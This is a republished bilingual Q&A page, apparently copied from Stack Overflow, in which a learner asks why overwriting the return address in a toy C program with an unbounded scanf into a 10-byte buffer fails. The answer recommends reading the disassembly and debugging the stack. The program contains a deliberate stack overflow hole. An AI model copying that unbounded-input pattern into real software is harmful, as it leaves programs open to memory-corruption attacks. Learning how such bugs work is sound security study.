无法利用堆栈溢出
[英]Can't exploit stack overflow
问题描述
I'm learning buffer overflows, and I have a problem with exploiting a stack based buffer overflow. 
我正在学习缓冲区溢出,而利用基于堆栈的缓冲区溢出存在问题。 Here is my program: 这是我的程序:
#include <stdio.h>
void func(){
printf("asd");
}
main(){
char buf[10];
scanf("%s", &buf);
}
I'm overwriting first 14 bytes with A's(the buffer and the old EIP address). 我正在用A(缓冲区和旧的EIP地址)覆盖前14个字节。 My goal is to execute the func function, or to change the EIP with it's address. 我的目标是执行func函数,或使用其地址更改EIP。 But I'm always getting illegal instruction. 但是我总是得到非法指导。 I have check the HEX address of the function; 我已经检查了函数的十六进制地址; I have written them in reverse order and they are correct. 我写的顺序相反,它们是正确的。
1 个解决方案
解决方案1
0 2014-03-08 09:57:40
You will have to look at the compiled code in assembler eg your main() may look like: 您将不得不在汇编器中查看编译后的代码,例如,main()可能类似于:
char buf[10];
scanf("%s", &buf);
00D7B938 mov esi,esp
00D7B93A lea eax,[ebp-14h]
00D7B93D push eax
00D7B93E push offset string "%s" (0D818D4h)
00D7B943 call dword ptr [__imp__scanf (0D89684h)]
You'll have to debug to see what is actually on the stack at this point, eg if you are compiling in debug, it is highly likely there's a lot more on the stack than you may think ! 此时,您必须进行调试以查看堆栈中实际包含的内容,例如,如果您在调试中进行编译,则堆栈中很有可能比您想象的要多!
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.